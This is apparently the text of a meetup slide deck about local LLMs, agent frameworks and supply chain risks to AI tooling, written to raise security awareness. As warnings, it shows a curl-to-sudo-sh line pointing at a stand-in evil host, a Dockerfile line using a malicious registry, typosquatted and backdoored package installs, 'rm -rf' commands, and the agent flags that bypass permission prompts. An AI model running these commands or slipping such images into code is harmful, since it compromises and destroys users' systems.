πŸ¦™
πŸ¦™

Local LLMs,
Agent Tools &
Supply Chain Nightmares

Manuel Gaar Β· PreciPoint AI Meetup Β· May 2026

or: what happens when your autocomplete gets sudo fnord

πŸ“‹

00 Β· Agenda

🏠

Why local?

But "local" doesn't mean "safe":

πŸ¦™

Ollama β€” LLMs as a service, but localhost

$ curl -fsSL https://ollama.com/install.sh | sh
# ^ yes, we'll talk about piping curl to sh later

$ ollama pull qwen3.5:9b
$ ollama pull gemma4:12b

# Chat mode
$ ollama run qwen3.5:9b

# API mode (OpenAI-compatible!)
$ curl http://localhost:11434/v1/chat/completions \
  -d '{"model":"qwen3.5:9b","messages":[{"role":"user","content":"explain WebRTC in 3 sentences"}]}'
πŸ–₯️

My Rig β€” AMD all the way

  • CPU: AMD Ryzen 7 5800X
  • RAM: 64 GB DDR4
  • GPU: Radeon RX 6800 XT (16 GB VRAM)
  • ROCm: natively supported (gfx1030 / RDNA 2)
  • Runs Qwen 3.5:9B and Gemma 4:12B comfortably
# Windows System Environment Variables
# Settings β†’ System β†’ About β†’ Advanced β†’ Environment Variables

OLLAMA_HOST = 127.0.0.1
OLLAMA_FLASH_ATTENTION = 1
OLLAMA_GPU_OVERHEAD = 0
OLLAMA_API_KEY = d3b3a9****...****OUMad
HSA_OVERRIDE_GFX_VERSION = 10.3.0
ROCR_VISIBLE_DEVICES = 0
phife at phife-pc in ~
$ ollama ps
NAME ID SIZE PROCESSOR CONTEXT UNTIL
gemma4:latest c6eb396dbd59 13 GB 100% GPU 131072 5 minutes from now

13 GB model fits entirely in 16 GB VRAM β€” no CPU offload needed.

🐘

The Model Zoo

Qwen 3 (8B)

Alibaba's powerhouse. Great coding, multilingual, tool-calling built in. Runs on 8GB VRAM.

OSSLocal

Gemma 4 (12B)

Google's latest. Multimodal, strong reasoning, surprisingly good at agentic tasks.

OSSLocal

MiniMax M2.5

Chinese dark horse. 10B active params, 230B total MoE. Fastest-climbing on OpenRouter. Strong at agentic coding and tool use.

OSSCloud*

GPT-OSS (OpenAI)

OpenAI's first open weights since GPT-2. 20B runs on 16GB RAM. Native tool calling, MXFP4 quantized. Apache 2.0.

OSSLocal

* MiniMax M2.5 available via Ollama cloud or self-hosted with serious hardware

πŸ› οΈ

Agent Tools β€” making LLMs do things

An LLM alone is just a fancy autocomplete. Agent frameworks give it:

(the guardrails part is... a work in progress)

πŸ€–

Local Agent Stack

OpenClaw / PicoClaw

Created by Peter Steinberger (Austria, ex-PSPDFKit). Now at OpenAI. Project moved to an open-source foundation. 247k+ GitHub stars.

  • OSS coding agent inspired by Claude Code
  • PicoClaw β€” minimal fork, runs on a Raspberry Pi
  • Focused on code: file editing, git, tests, commits
  • No built-in memory β€” add and maintain it yourself
  • Sandboxing available but needs manual setup
  • Browser & web search via skills/MCP
  • Messaging: Telegram, Discord, Slack, WhatsApp, iMessage
  • TTS, STT, image gen available via MCP servers / ClawHub skills β€” not built-in
  • Local Ollama models or cloud providers via API key
  • Complex and heavyweight β€” ~500 MB RAM for the gateway alone, no LLM loaded

Hermes Agent (NousResearch)

Built by Nous Research (US, $70M funded). Founded by Jeff Quesnelle, Karan Malhotra & Teknium. 50k+ GitHub stars in 46 days.

  • Full agentic platform, not just a coding tool
  • 3-layer memory: MEMORY.md + USER.md (system prompt), SQLite FTS5 session search, pluggable providers (Mem0, Hindsight, etc.)
  • Learns reusable skills from completed tasks
  • Native Docker isolation with one config line
  • Dangerous command approval system built in
  • Built-in browser automation, web search & extraction
  • Gateway: Telegram, Discord, Slack, WhatsApp, Signal, Email
  • TTS (9 providers incl. Edge, ElevenLabs, OpenAI, MiniMax)
  • STT via local Whisper, Groq, OpenAI, or Mistral Voxtral
  • Image generation via FAL.ai (8 models incl. FLUX 2, GPT-Image)
  • Local Ollama models or cloud providers via API key
☁️

The Cloud Contenders

Claude Code

Anthropic's terminal agent. Reads your repo, edits files, runs tests. Scarily competent.

CloudClosed

βœ“ Best code quality (subjective!)

Codex (OpenAI)

OpenAI's answer to Claude Code. Multi-file editing, sandboxed execution.

CloudClosed

⚑ Sandboxed by default

Gemini CLI

Google's entry. Free tier generous. Works with Gemma locally too. Google-scale search built in.

CloudFree tier

πŸ” Grounding with Search

βš–οΈ

Local vs Cloud β€” the honest truth

Local (Ollama + OpenClaw)

  • βœ… Full data sovereignty
  • βœ… No API costs
  • βœ… Works offline / air-gapped
  • ❌ Smaller models = less capable
  • ❌ Your GPU, your electricity bill
  • ❌ Limited context window on smaller models

Cloud (Claude Code et al.)

  • βœ… Frontier model intelligence
  • βœ… Web search, MCP, integrations
  • βœ… Zero infra management
  • ❌ Data leaves your machine
  • ❌ Costs add up fast
  • ❌ Rate limits at the worst moment

"Localhost is lava β€” until you realize the cloud is someone else's localhost." β€” the eternal DevOps koan

πŸ“„

The *.md file landscape

every tool invented its own config format β€” in markdown

  • CLAUDE.md β€” Claude Code project context
  • AGENTS.md β€” Linux Foundation "universal" standard
  • GEMINI.md β€” Google Gemini CLI
  • SOUL.md β€” Hermes agent persona & personality
  • MEMORY.md / USER.md β€” Hermes persistent memory
  • SKILL.md β€” portable agent skills (Claude, Codex, Hermes). OpenClaw has ClawHub β€” npm for agent skills, 15k+ published
  • copilot-instructions.md β€” GitHub Copilot
  • …and .cursorrules, .windsurfrules, JULES.md, and counting

The problem: same content, 10 different files, slowly drifting apart in every repo.

The workaround:

# one source of truth, symlinked everywhere
$ ln -sfn AGENTS.md .github/copilot-instructions.md
$ ln -sfn AGENTS.md .cursor/rules/main.mdc
# elegant? no. prevents drift? yes.

The bet: AGENTS.md becomes the README.md of agent config. Not because it's best β€” because Linux Foundation gravity wins.

Standards are great. That's why we have so many of them. fnord

πŸ’€

Now the scary part

Supply Chain Attacks on AI Tooling

Remember event-stream? Remember colors.js?

March 2026: LiteLLM β€” the most popular LLM proxy on PyPI (95M downloads/month) β€” was backdoored for 5 hours. Credential harvester, K8s lateral movement, persistent backdoor. The attack started with a compromised security scanner.

"Your vulnerability scanner stole the token that backdoored your AI gateway."
🎯

Attack Vectors

Malicious Model
β†’
ollama pull
β†’
Agent Framework
β†’
shell access
β†’
πŸ’€ game over
πŸ”₯

This is not hypothetical

LiteLLM β€” PyPI backdoor

March 24, 2026. TeamPCP compromised Trivy, stole a PyPI token, and backdoored LiteLLM.

pip install litellm==1.82.8

A .pth file fired on every Python startup β€” no import needed. Harvested SSH keys, cloud creds, K8s secrets. Deployed privileged pods to every node.

Axios β€” npm hijack

March 31, 2026. Compromised maintainer account. Malicious versions published to both latest and legacy tags.

npm install axios@1.14.1

Cross-platform RAT deployed in under 15 seconds. 100M weekly downloads. North Korean state actor (Sapphire Sleet).

npm typosquatting

Ongoing forever. One typo, one crypto miner. 454k malicious packages published to npm in 2025 alone.

npm install olama ← not ollama

The "helpful" agent

"I'll fix your Dockerfile." Agent quietly swaps in:

FROM evil-registry.io/totally-legit-ubuntu:latest

You approve the diff without reading it. Classic.

curl | sh β€” we all do it

curl -fsSL https://install.evil.ai | sudo sh

πŸ’£

The YOLO Bomb Shell Flags

every cloud agent ships a "please delete my career" flag

# Claude Code
$ claude --dangerously-skip-permissions
# Bypasses ALL permission prompts. File edits, shell commands, MCP tools.
# Real incident: user lost entire home dir via rm -rf ~/

# Codex CLI
$ codex --dangerously-bypass-approvals-and-sandbox
# Or just: codex --yolo
# Disables approvals AND the sandbox. Full host access.

# Gemini CLI
$ gemini --yolo
# Or mid-session: Ctrl+Y to enable. No undo.
# Can also be set as env var: GEMINI_YOLO_MODE=true

All three agents can read your files, run shell commands, and call APIs. These flags remove the only thing standing between the LLM and sudo rm -rf /.

YOLO β€” You Only Live Once. Which is exactly how many times you'll run rm -rf ~/ before learning your lesson. fnord

πŸ›‘οΈ

Mitigations β€” what you can actually do

Every pip install is a mass CVE generator. Every ollama pull is a trust exercise. Every SKILL.md is a shell script in a trenchcoat. fnord

🌿

Vibe Coding + Git

Without git

  • Agent rewrites files you didn't ask it to touch
  • "Small refactor" cascades across 15 files
  • YOLO flag deletes something you can't recover
  • You approve diffs without reading them

With git

  • Commit before every agent session
  • Feature branches only β€” agents never touch main
  • git diff before every commit
  • git reset --hard when it all goes wrong

How each agent handles it

Claude Code

Auto checkpoints before every change. Esc+Esc rollback. Refuses force-push to main. Auto-commit via PostToolUse hooks.

Hermes

Built-in checkpoints + /rollback command. Git worktree isolation via -w flag. Per-file restore supported.

OpenClaw

No built-in git safety. Bring your own discipline, your own hooks, your own branch strategy.

Git is not optional in the age of AI agents. It's the seatbelt. fnord

πŸ”’

Agent Isolation β€” config compared

Hermes β€” 5 lines

# ~/.hermes/config.yaml
terminal:
  backend: docker
  persistent_shell: true
  timeout: 180
approvals:
  mode: manual

Read-only root FS, dropped capabilities, namespace isolation β€” all handled automatically.

OpenClaw β€” a bit more involved

# ~/.openclaw/openclaw.json
"agents": { "defaults": {
  "sandbox": {
    "mode": "all",
    "backend": "docker",
    "scope": "session",
    "workspaceAccess": "rw"
  }
}}
# + 3 permission layers to configure:
# agent tools, sandbox tools, network

Sandbox off by default. Network isolated by default. Three permission gates to align manually.

πŸŽͺ

Live Demo

if the demo gods are merciful today

Demo 1 β€” OpenClaw

  • Ollama + Qwen 3.5:9B
  • OpenClaw in the browser
  • Code editing task

Demo 2 β€” Hermes

  • Ollama + Gemma 4:latest
  • Hermes via shell tool
  • Same task, different approach

Then: side-by-side with Claude Code on the same task. Spot the difference.

🧠

TL;DR

The stack

  • Local LLMs are ready for daily use β€” often more practical than reaching for a cloud model
  • Cloud agents are still king for complex refactors and reasoning
  • The best setup is hybrid β€” local for speed and privacy, cloud for heavy lifting
  • Money, API access, and hardware are the cheatcode. But nothing has really changed, same gold rush energy as the early internet days or when crypto came out

The risks

  • Supply chain security is the next frontier. Treat model pulls like Docker pulls or checking emails for phishing
  • Frontier models are more likely to be safe than open-source models. No model is audited anyway, especially not the small ones
  • Breaking changes are the new normal. Expect them weekly, not quarterly
  • Security incidents are more frequent, more cascaded, and hit harder than ever

Working with AI agents β€” lessons learned

πŸ”§

How this was built

  • Claude Pro subscription β€” Anthropic's consumer plan
  • Claude Opus 4.6 β€” frontier model, not a local lightweight
  • Claude Code β€” running natively in a Debian WSL shell, isolated workspace
  • Manuel in the loop β€” every slide reviewed, corrected, and iterated on by a human

No PowerPoint, no framework, no browser IDE. Just Claude Code in a terminal, a frontier model, and a human who kept saying "no, rephrase that."

  • ~50 turns of back-and-forth
  • ~1.1M tokens consumed (AI estimation^^)
  • 2x daily rate limit hit
  • ~4 hours including research
  • Web search for every technical claim
  • 22 slides, ~1000 lines of HTML/CSS/JS
  • Zero npm/pip dependencies

The model wrote the code. The human steered the content. Neither would have finished alone.

πŸ“‘

Links & Resources

Questions? (or complaints about this not being PowerPoint)

No models were audited. No SKILL.md was reviewed. YOLO.

No Raspberry Pis, Hetzner VMs, or open-source models were harmed during this exploration. fnord

Disclaimer: this presentation is most likely outdated by the time you watch it. That's the point.